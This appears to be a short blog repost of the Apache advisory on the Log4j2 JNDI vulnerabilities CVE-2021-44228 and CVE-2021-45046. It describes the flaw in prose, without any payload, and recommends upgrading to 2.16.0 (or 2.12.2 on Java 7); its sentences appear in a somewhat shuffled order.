![]() See the entire description and history on the Apache Logging security page. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. In Apache Log4j2 versions up to and including 2.14.1, the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints Users still on Java 7 should upgrade to the Log4j 2.12.2 release. ![]() While the 2.15.0 release addressed the most severe vulnerability, the fix in Log4j 2.15.0 was incomplete in some non-default configurations and could allow an attacker to execute a denial of service (DoS) attack. ![]() We recommend that users update to 2.16.0 if possible. The most recent CVE has been addressed in Apache Log4j 2.16.0, released on 13 December. In this post we’ll list the CVEs affecting Log4j and keep a list of frequently asked questions. The Apache Software Foundation project Apache Logging Services has responded to a security vulnerability that is described in two CVEs, CVE-2021-44228 and CVE-2021-45046.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |